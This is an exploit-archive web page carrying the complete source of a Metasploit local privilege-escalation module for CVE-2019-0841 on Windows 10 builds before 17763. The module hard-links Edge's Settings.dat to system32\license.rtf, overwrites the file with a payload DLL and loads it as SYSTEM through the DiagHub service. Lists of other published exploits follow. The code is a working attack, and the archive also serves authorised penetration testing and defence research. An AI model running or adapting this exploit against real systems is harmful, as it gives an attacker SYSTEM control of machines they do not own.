Menu

Search for hundreds of thousands of exploits

"Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

windows

Release date

Exploit published date

2019-07-16

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Exploit::EXE
  include Post::File
  include Post::Windows::Priv
  include Post::Windows::FileInfo
  include Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AppXSvc Hard Link Privilege Escalation',
      'Description'    => %q(
        There exists a privilege escalation vulnerability for
        Windows 10 builds prior to build 17763. Due to the AppXSvc's
        improper handling of hard links, a user can gain full
        privileges over a SYSTEM-owned file. The user can then utilize
        the new file to execute code as SYSTEM.

        This module employs a technique using the Diagnostics Hub Standard
        Collector Service (DiagHub) which was discovered by James Forshaw to
        load and execute a DLL as SYSTEM.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
      [
        'Nabeel Ahmed',      # Vulnerability discovery and PoC
        'James Forshaw',     # Code creating hard links and communicating with DiagHub service
        'Shelby Pace'        # Metasploit module
      ],
      'References'     =>
        [
          [ 'CVE', '2019-0841' ],
          [ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ],
          [ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ],
          [ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ],
          [ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ]
        ],
      'Targets'        =>
        [
          [ 'Windows 10', { 'Platform' => 'win' } ]
        ],
      'DisclosureDate' => '2019-04-09',
      'DefaultTarget'  => 0
    ))
  end

  def check
    return CheckCode::Unknown if sysinfo['OS'] !~ /windows\s10/i

    path = expand_path('%WINDIR%\\system32\\win32k.sys')
    major, minor, build, revision, brand = file_version(path)
    return CheckCode::Appears if build < 17763

    CheckCode::Detected
  end

  def upload_file(file_name, file_path)
    contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', file_name))
    write_file(file_path, contents)
    register_file_for_cleanup(file_path)
  rescue
    fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target')
  end

  def init_process
    print_status("Attempting to launch Microsoft Edge minimized.")
    cmd_exec("cmd.exe /c start /min microsoft-edge:", nil, 30)
  end

  def mk_hard_link(src, target, link_exe)
    out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"")

    return (out && out.include?('Done'))
  end

  def write_payload
    print_status('Writing the payload to disk')
    code = generate_payload_dll
    @original_data = read_file(@rtf_path)
    write_file(@rtf_path, code)
  end

  def exploit
    vuln_status = check
    fail_with(Failure::NotVulnerable, 'Failed to detect Windows 10') if vuln_status == CheckCode::Unknown

    fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system?
    cmd_exec("taskkill /F /IM MicrosoftEdge.exe /FI \"STATUS eq RUNNING\"")
    dat_path = expand_path("%USERPROFILE%\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\Settings.dat")
    fail_with(Failure::NotFound, 'Path does not exist') unless exist?(dat_path)

    if session.arch == ARCH_X86
      exe_name = 'CVE-2019-0841_x86.exe'
      f_name = 'diaghub_load_x86.exe'
    elsif session.arch == ARCH_X64
      exe_name = 'CVE-2019-0841_x64.exe'
      f_name = 'diaghub_load_x64.exe'
    end
    link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe")
    upload_file(exe_name, link_file_name)

    @rtf_path = expand_path('%WINDIR%\\system32\\license.rtf')
    fail_with(Failure::UnexpectedReply, 'Did not retrieve expected output') unless mk_hard_link(dat_path, @rtf_path, link_file_name)
    print_good('Successfully created hard link')
    init_process
    cmd_exec("taskkill /F /IM MicrosoftEdge.exe")

    write_payload
    diaghub_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(8..12)}")
    upload_file(f_name, diaghub_path)
    cmd = "\"#{diaghub_path}\" \"license.rtf\""
    cmd_exec(cmd)
  end

  def cleanup
    folder_path = expand_path("%TEMP%\\etw")
    dir_rm(folder_path)

    write_file(@rtf_path, @original_data)
    super
  end
end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-05-25 "Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)" remote hardware Metasploit
2020-05-25 "Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)" remote windows Metasploit
2020-05-22 "WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)" remote multiple Metasploit
2020-05-19 "Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)" remote php Metasploit
2020-05-01 "Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)" remote multiple Metasploit
2020-04-28 "Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)" local windows Metasploit
2020-04-20 "Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)" remote linux Metasploit
2020-04-17 "Nexus Repository Manager - Java EL Injection RCE (Metasploit)" remote linux Metasploit
2020-04-16 "Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)" remote linux Metasploit
2020-04-16 "Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)" remote java Metasploit
2020-04-16 "Apache Solr - Remote Code Execution via Velocity Template (Metasploit)" remote multiple Metasploit
2020-04-16 "ThinkPHP - Multiple PHP Injection RCEs (Metasploit)" remote linux Metasploit
2020-04-16 "PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)" remote php Metasploit
2020-04-16 "DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2020-04-16 "TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)" remote linux_mips Metasploit
2020-04-16 "VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)" local macos Metasploit
2020-03-31 "Redis - Replication Code Execution (Metasploit)" remote linux Metasploit
2020-03-31 "SharePoint Workflows - XOML Injection (Metasploit)" remote windows Metasploit
2020-03-31 "DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)" remote hardware Metasploit
2020-03-31 "IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)" remote multiple Metasploit
2020-03-17 "ManageEngine Desktop Central - Java Deserialization (Metasploit)" remote multiple Metasploit
2020-03-17 "Rconfig 3.x - Chained Remote Code Execution (Metasploit)" remote linux Metasploit
2020-03-10 "PHPStudy - Backdoor Remote Code execution (Metasploit)" remote php Metasploit
2020-03-10 "Nagios XI - Authenticated Remote Command Execution (Metasploit)" remote linux Metasploit
2020-03-09 "OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)" local linux Metasploit
2020-03-09 "Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)" remote windows Metasploit
2020-03-09 "PHP-FPM - Underflow Remote Code Execution (Metasploit)" remote php Metasploit
2020-03-09 "Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)" remote multiple Metasploit
2020-03-09 "Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)" remote multiple Metasploit
2020-03-09 "Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)" remote multiple Metasploit 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected